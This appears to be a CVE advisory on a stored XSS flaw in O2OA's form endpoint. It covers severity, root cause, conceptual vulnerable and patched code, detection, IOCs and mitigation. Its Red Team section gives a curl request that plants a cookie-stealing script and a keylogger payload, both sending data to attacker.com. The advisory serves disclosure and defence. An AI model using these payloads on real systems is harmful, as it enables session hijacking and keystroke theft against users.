CVE-2025-9716
Executive Summary
CVE-2025-9716 is a stored cross-site scripting (XSS) vulnerability in O2OA, an open-source enterprise collaboration platform. The flaw exists in the /x_processplatform_assemble_designer/jaxrs/form endpoint, specifically within the Personal Profile Page functionality. An attacker can inject malicious scripts via the name, alias, or description parameters, which are then stored and executed in the context of other users' browsers. The vulnerability is remotely exploitable with low complexity, requiring user interaction. A proof-of-concept has been publicly disclosed, increasing the risk of active exploitation. The vendor has acknowledged the issue and plans to fix it in a future release, but no patch is currently available.
This record — and 170,000+ others — are available via the ValtersIT API. One endpoint replaces five: NVD + GitHub CVE + CISA KEV + EPSS + Nuclei + Exploit-DB, unified.

Supply Chain & Package Security
This vulnerability does not affect a package manager ecosystem (NPM, PyPI, Go, Ruby). O2OA is a Java-based application distributed as a standalone server package.
CVSS Breakdown & Threat Level
- CVSS Score: 3.5 (Low)
- Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
- Attack Vector (AV): Network (N) – The attack can be launched remotely.
- Attack Complexity (AC): Low (L) – No special conditions are required.
- Privileges Required (PR): None (N) – No authentication needed to trigger the vulnerability.
- User Interaction (UI): Required (R) – The victim must click on a crafted link or visit a malicious page.
- Scope (S): Unchanged (U) – The vulnerable component and the impacted component are the same.
- Confidentiality (C): None (N) – No direct data breach.
- Integrity (I): Low (L) – The attacker can modify content within the user's session.
- Availability (A): None (N) – No impact on system availability.
Threat Level: Low. The low CVSS score and requirement for user interaction reduce the immediate risk. However, the public availability of an exploit and the lack of a patch elevate the threat for unpatched instances.
Deep Dive & Mechanics
The vulnerability resides in the O2OA REST API endpoint /x_processplatform_assemble_designer/jaxrs/form. This endpoint is used to manage form definitions within the platform. The name, alias, and description parameters are not properly sanitized before being stored in the database and later rendered in the Personal Profile Page.
Attack Flow:
- An attacker sends a POST or PUT request to the vulnerable endpoint with malicious JavaScript payloads in the
name,alias, ordescriptionfields. - The server stores the unsanitized payload in its database.
- When an administrator or other user views the Personal Profile Page (which renders these fields), the malicious script executes in their browser.
- The script can steal session cookies, perform actions on behalf of the victim, or deface the page.
Root Cause: Lack of input validation and output encoding. The application fails to escape HTML entities before storing and rendering user-supplied data.
Vulnerable vs. Patched Code
Vulnerable Code (Conceptual):
// Vulnerable endpoint handler
@POST
@Path("/form")
public Response createForm(FormData formData) {
// Directly stores user input without sanitization
formData.setName(formData.getName());
formData.setAlias(formData.getAlias());
formData.setDescription(formData.getDescription());
// ... save to database
}
Patched Code (Expected):
// Patched endpoint handler
@POST
@Path("/form")
public Response createForm(FormData formData) {
// Sanitize input using a library like OWASP Java Encoder
formData.setName(Encode.forHtml(formData.getName()));
formData.setAlias(Encode.forHtml(formData.getAlias()));
formData.setDescription(Encode.forHtml(formData.getDescription()));
// ... save to database
}
The patched version would use context-aware encoding (e.g., Encode.forHtml()) to neutralize any HTML/JavaScript before storage. Additionally, output encoding should be applied when rendering these fields in the Personal Profile Page.
Exploitation & Lab Setup
Red Team
Prerequisites:
- A running O2OA instance (version <= 10.0-410)
- Network access to the vulnerable endpoint
- A victim user who will view the Personal Profile Page
Exploit Steps:
- Craft a malicious payload. For example, to steal cookies:
<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script> - Send a POST request to the vulnerable endpoint:
curl -X POST "http://target.com/x_processplatform_assemble_designer/jaxrs/form" \ -H "Content-Type: application/json" \ -d '{ "name": "<script>document.location=\"http://attacker.com/steal?cookie=\"+document.cookie</script>", "alias": "test", "description": "test" }' - The payload is stored. When an administrator visits the Personal Profile Page, the script executes and sends the cookie to the attacker's server.
Alternative Payload (Keylogger):
<script>
document.onkeypress = function(e) {
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://attacker.com/log', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send('key=' + e.key);
}
</script>
Blue Team
Detection:
- Monitor HTTP requests to
/x_processplatform_assemble_designer/jaxrs/formfor suspicious payloads containing<script>tags or event handlers. - Look for outbound connections to unknown domains from the O2OA server or client browsers.
- Review server logs for unusual POST/PUT requests with HTML/JavaScript in the
name,alias, ordescriptionfields.
Mitigation:
- Apply input validation and output encoding as described in the patched code section.
- Use a Web Application Firewall (WAF) to block XSS payloads.
- Restrict access to the vulnerable endpoint to authenticated users only.
- Monitor for the public exploit and apply the vendor's patch as soon as it is released.
Indicators of Compromise (IOCs)
- Network IOCs:
- HTTP requests to
/x_processplatform_assemble_designer/jaxrs/formcontaining<script>tags or JavaScript event handlers. - Outbound HTTP requests from the O2OA server to unknown IPs/domains (e.g.,
attacker.com).
- HTTP requests to
- File IOCs:
- Log entries in O2OA server logs showing unsanitized HTML/JavaScript in form fields.
- Behavioral IOCs:
- Unexpected changes to form definitions or user profiles.
- Unusual session activity or cookie theft.

Remediation & Mitigation
Immediate Actions:
- Disable the vulnerable endpoint if not required, by blocking access to
/x_processplatform_assemble_designer/jaxrs/formvia a reverse proxy or firewall. - Apply input validation manually by modifying the O2OA source code to sanitize the
name,alias, anddescriptionparameters using a library like OWASP Java Encoder. - Implement a WAF rule to block requests containing
<script>tags or JavaScript event handlers in the request body.
Long-term Fix:
- Monitor the O2OA GitHub repository for the official patch. Once released, update to the patched version immediately.
- Conduct a security audit of all user input handling in the application.
Workaround:
- Restrict access to the Personal Profile Page to trusted administrators only.
- Use Content Security Policy (CSP) headers to mitigate the impact of XSS:
Content-Security-Policy: default-src 'self'; script-src 'self'
